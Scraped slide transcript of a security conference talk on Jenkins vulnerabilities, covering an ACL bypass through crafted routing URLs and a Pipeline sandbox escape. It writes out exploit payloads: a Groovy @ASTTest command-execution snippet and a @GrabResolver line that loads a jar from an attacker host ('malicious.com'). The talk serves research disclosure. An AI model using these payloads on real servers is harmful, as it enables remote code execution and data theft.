Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to...
Transcript of Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to...
![Page 1: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/1.jpg)
Hacking Jenkins!Orange Tsai
![Page 2: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/2.jpg)
• Come from Taiwan
• Principal security researcher at DEVCORE
• Speaker at Black Hat US/ASIA, DEFCON, HITB, CODEBLUE…
• CTF player (Captain of HITCON CTF team and member of 217)
• Bounty hunter (Found RCE on Facebook, GitHub, Twitter, Uber…)
Orange Tsai
orange_8361
![Page 3: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/3.jpg)
Outline
• Introduction & architecture
• The vulnerability root cause & how to exploit
1. ACL bypass vulnerability
2. Sandbox escape vulnerability
• Evolution of the exploit
![Page 4: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/4.jpg)
What is JenkinsA famous CI/CD service
![Page 5: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/5.jpg)
What is CI/CDContinuous Integration and Continuous Delivery
![Page 6: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/6.jpg)
Why JenkinsHacker-friendly
![Page 7: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/7.jpg)
JVM ecosystem report 2018
https://snyk.io/blog/jvm-ecosystem-report-2018/
![Page 8: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/8.jpg)
Jenkins for hackers
• Lots of
• source code
• credential / GitHub token
• computer node(Intranet!!!)
![Page 9: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/9.jpg)
![Page 10: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/10.jpg)
![Page 11: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/11.jpg)
![Page 12: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/12.jpg)
![Page 13: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/13.jpg)
Common attack vectors
• Login portal
• Known vulnerabilities
![Page 14: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/14.jpg)
Common attack vectors
• Login portal
• Known vulnerabilities
![Page 15: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/15.jpg)
![Page 16: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/16.jpg)
Common attack vectors
• Login portal
• Known vulnerabilities
![Page 17: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/17.jpg)
Past deserialization bugs on Jenkins
![Page 18: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/18.jpg)
Past deserialization bugs on Jenkins• CVE-2015-8103 - The first deserialization bug
• CVE-2016-0788- Bypass the blacklist by the JRMP gadget
• CVE-2016-0792 - Bypass the blacklist by the XStream
• CVE-2016-9299 - Bypass the blacklist by the LDAP gadget
• CVE-2017-1000353 - Bypass the blacklist by the SignedObject…
![Page 19: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/19.jpg)
Jenkins remoting 2.54
CVE-2015-8103
![Page 20: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/20.jpg)
Jenkins remoting 2.55CVE-2016-0788
![Page 21: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/21.jpg)
Jenkins remoting 3.2CVE-2016-9299
![Page 22: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/22.jpg)
Jenkins remoting 3.28
CVE-2017-1000353
![Page 23: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/23.jpg)
Jenkins is so angry that rewrite all the serialization protocol
into a new HTTP-based protocol
![Page 24: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/24.jpg)
No deserialization anymoreThere is no more pre-auth RCE in Jenkins core since 2017
![Page 25: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/25.jpg)
Discover new one
![Page 26: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/26.jpg)
Reviewing scopes1. Jenkins core
2. Stapler framework
3. Default plugins
![Page 27: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/27.jpg)
CVEs
1. CVE-2018-1000600 - CSRF and missing permission checks in GitHub Plugin
2. CVE-2018-1000861 - Code execution through crafted URLs
3. CVE-2018-1999002 - Arbitrary file read vulnerability
4. CVE-2018-1999046 - Unauthorized users could access agent logs
5. CVE-2019-1003000 - Sandbox Bypass in Script Security and Pipeline Plugins
6. CVE-2019-1003001 - Sandbox Bypass in Script Security and Pipeline Plugins
7. CVE-2019-1003002 - Sandbox Bypass in Script Security and Pipeline Plugins
![Page 28: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/28.jpg)
Review Java web
• Where is the configuration?
• Where is the library?
• Where is the application code?
• Where is the entry point?
ROOT/
├── index.jsp
├── robots.txt
└── WEB-INF
├── classes
│ └── HelloWorld.class
├── lib
│ └── servlet-api.jar
└── web.xml
<servlet><servlet-name>Stapler</servlet-name><servlet-class>org.kohsuke.stapler.Stapler</servlet-class>
</servlet>…<servlet-mapping>
<servlet-name>Stapler</servlet-name><url-pattern>/*</url-pattern>
</servlet-mapping>
Jenkins/war/src/main/webapp/WEB-INF/web.xml
![Page 29: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/29.jpg)
Jenkins dynamic routing
![Page 30: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/30.jpg)
Routing rules
<token>
get<token>()
get<token>(String)
get<token>(Int)
get<token>(Long)
get<token>(StaplerRequest)
getDynamic(String, …)
doDynamic(…)
do<token>(…)
js<token>(…)
@WebMethod annotation
@JavaScriptMethod annotation
![Page 31: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/31.jpg)
Method Chain
jenkins.model.Jenkins.getFoo()
.getBar(1)
.getBaz("orange")
http://jenkins/foo/bar/1/baz/orange
![Page 32: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/32.jpg)
CVE-2018-1000861Code execution through crafted URLs
Routing Access Control List Bypass
Bypass Overall/Read permission
![Page 33: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/33.jpg)
What's wrong with that?Here are two problems
![Page 34: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/34.jpg)
First problemEvery class in Java inherits Object class, except Object itself
![Page 35: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/35.jpg)
jenkins.model.Jenkins.getClass()
.getClassLoader()
.getResource("index.jsp")
.getContent()
http://jenkins/class/classLoader
/resource/index.jsp/content
![Page 36: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/36.jpg)
jenkins.model.Jenkins
.getClass()
.getClassLoader()
.getResource("index.jsp")
.getContent()
1. get<token>()
2. get<token>(String)
3. get<token>(Int)
4. get<token>(Long)
5. get<token>(StaplerRequest)
6. getDynamic(String, …)
7. doDynamic(…)
8. do<token>(…)
9. ……
public final Class<?> getClass()
java.lang.Object
![Page 37: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/37.jpg)
public ClassLoader getClassLoader()
java.lang.Class
1. get<token>()
2. get<token>(String)
3. get<token>(Int)
4. get<token>(Long)
5. get<token>(StaplerRequest)
6. getDynamic(String, …)
7. doDynamic(…)
8. do<token>(…)
9. ……
jenkins.model.Jenkins
.getClass()
.getClassLoader()
.getResource("index.jsp")
.getContent()
![Page 38: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/38.jpg)
public URL getResource(String name)
java.lang.ClassLoader
1. get<token>()
2. get<token>(String)
3. get<token>(Int)
4. get<token>(Long)
5. get<token>(StaplerRequest)
6. getDynamic(String, …)
7. doDynamic(…)
8. do<token>(…)
9. ……
jenkins.model.Jenkins
.getClass()
.getClassLoader()
.getResource("index.jsp")
.getContent()
![Page 39: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/39.jpg)
public final Object getContent()
java.net.URL
1. get<token>()
2. get<token>(String)
3. get<token>(Int)
4. get<token>(Long)
5. get<token>(StaplerRequest)
6. getDynamic(String, …)
7. doDynamic(…)
8. do<token>(…)
9. ……
jenkins.model.Jenkins
.getClass()
.getClassLoader()
.getResource("index.jsp")
.getContent()
![Page 40: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/40.jpg)
Second problemURL prefix whitelist bypass
![Page 41: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/41.jpg)
URL whitelists by default
![Page 42: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/42.jpg)
URL whitelists by default
jenkins.model.Jenkins.doLogout(…)
http://jenkins/logout
![Page 43: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/43.jpg)
jenkins.model.Jenkins
.getSearch()
http://jenkins/search?q=
403 Forbidden
![Page 44: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/44.jpg)
What if there is a whitelisted method returns a Search object?
![Page 45: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/45.jpg)
URL whitelists by default
![Page 46: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/46.jpg)
http://jenkins/securityRealm/
public SecurityRealm getSecurityRealm()
Jenkins.model.Jenkins
jenkins.model.Jenkins
.getSecurityRealm()
![Page 47: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/47.jpg)
http://jenkins/securityRealm/user/[name]/
public User getUser(String id)
Jenkins.model.HudsonPrivateSecurityRealm
jenkins.model.Jenkins
.getSecurityRealm()
.getUser([name])
![Page 48: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/48.jpg)
http://jenkins/securityRealm/user/[name]/search
public Search getSearch()
Jenkins.model.AbstractModelObject
jenkins.model.Jenkins
.getSecurityRealm()
.getUser([name])
.getSearch()
![Page 49: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/49.jpg)
![Page 50: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/50.jpg)
Jenkins checks the permission again before most of dangerous methods
It's sad
![Page 51: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/51.jpg)
http://jenkins/script
![Page 52: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/52.jpg)
Maximize the severityEscalate to a pre-auth information leakage √
Escalate to a pre-auth Server Side Request Forgery √
Escalate to a pre-auth Remote Code Execution ?
![Page 53: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/53.jpg)
Remote Code Execution• CVE-2018-1000861 - Code execution through crafted URLs
• CVE-2019-1003000 - Sandbox Bypass in Script Security Plugins
![Page 54: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/54.jpg)
What is PipelinePipeline is a script to help developers more easier to write scripts
for software building, testing and delivering!
![Page 55: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/55.jpg)
Pipeline is a DSLWhich built with Groovy
![Page 56: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/56.jpg)
Pipeline syntax checkhttp://jenkins/descriptorByName
/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition
/checkScriptCompile?value=[Pipeline here]
![Page 57: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/57.jpg)
If you are the programmerHow do you implement this syntax-error-checking function?
![Page 58: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/58.jpg)
As I said beforePipeline is a DSL built with Groovy
![Page 59: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/59.jpg)
No execute(), only AST parse
![Page 60: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/60.jpg)
Nothing happened :(this.class.classLoader.parseClass('''
java.lang.Runtime.getRuntime().exec("touch pwned")
''');
![Page 61: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/61.jpg)
I failed to exploit beforeBut in this time, Meta-Programming flashed in my mind
![Page 62: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/62.jpg)
Meta-Programming isWrite programs that operate on other programs
• Compiler• Preprocessor• Interpreter• Linker• …
![Page 63: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/63.jpg)
Two type• compile-time
• Run-time
![Page 64: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/64.jpg)
compile-time Meta-Programming
• Operate the program during compiler/parsing time
• C Macro
• C++ Template
• Java Annotation
• DSL
• …$ gcc test.c –c && ls –size -h test.o
2GB test.o
![Page 65: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/65.jpg)
compile-time Meta-Programming
• Operate the program during compiler/parsing time
• C Macro
• C++ Template
• Java Annotation
• DSL
• …
Fibonacci number
![Page 66: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/66.jpg)
compile-time Meta-Programming
• Operate the program during compiler/parsing time
• C Macro
• C++ Template
• Java Annotation
• DSL
• …
![Page 67: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/67.jpg)
Groovy Meta-ProgrammingPipeline is a DSL built with Groovy
![Page 68: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/68.jpg)
Reading…
![Page 69: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/69.jpg)
@ASTTestWhat the hell is that
![Page 70: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/70.jpg)
@ASTTest@ASTTest is a special AST transformation meant to help debugging other AST
transformations or the Groovy compiler itself. It will let the developer “explore”
the AST during compilation and perform assertions on the AST rather than on
the result of compilation. This means that this AST transformations gives
access to the AST before the bytecode is produced. @ASTTest can be placed
on any annotable node and requires two parameters:
![Page 71: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/71.jpg)
@ASTTest@ASTTest(phase=CONVERSION, value={
assert node instanceof ClassNode
assert node.name == 'Person'
})
class Person {}
![Page 72: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/72.jpg)
Let's try that in localthis.class.classLoader.parseClass('''
@groovy.transform.ASTTest(value={
assert java.lang.Runtime.getRuntime().exec("touch pwned")
})
class Person {}
''');
![Page 73: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/73.jpg)
Let's try that in local$ ls
poc.groovy
$ groovy poc.groovy
$ ls
poc.groovy pwned
![Page 74: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/74.jpg)
While reproducing it on remote…It shows
What the hell is that
![Page 75: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/75.jpg)
Root cause analysis
• Pipeline Shared Groovy Libraries Plugin
• A plugin for importing customized libraries into Pipeline
• Jenkins loads your customized library before every Pipeline execute
• The root cause is - during compile-time, there is no
corresponded library in classPath
![Page 76: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/76.jpg)
How to fixAsk admin to uninstall the plugin
![Page 77: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/77.jpg)
How to fixAsk admin to uninstall the plugin
![Page 78: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/78.jpg)
@Grab@Grab(group='commons-lang', module='commons-lang', version='2.4')
import org.apache.commons.lang.WordUtils
println "Hello ${WordUtils.capitalize('world')}"
![Page 79: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/79.jpg)
@GrabResolve@GrabResolver(name='restlet', root='http://maven.restlet.org/')
@Grab(group='org.restlet', module='org.restlet', version='1.1.6')
import org.restlet
![Page 80: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/80.jpg)
@GrabResolve@GrabResolver(name='restlet', root='http://malicious.com/')
@Grab(group='org.restlet', module='org.restlet', version='1.1.6')
import org.restlet
![Page 81: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)](https://reader033.fdocuments.us/reader033/viewer/2022042920/5f64246dd8f64507e749d5d0/html5/thumbnails/81.jpg)
Oh, it works220.133.114.83 - - [18/Dec/2018:18:56:54 +0800] "HEAD
/org/restlet/org.restlet/1.1.6/org.restlet-1.1.6.jar
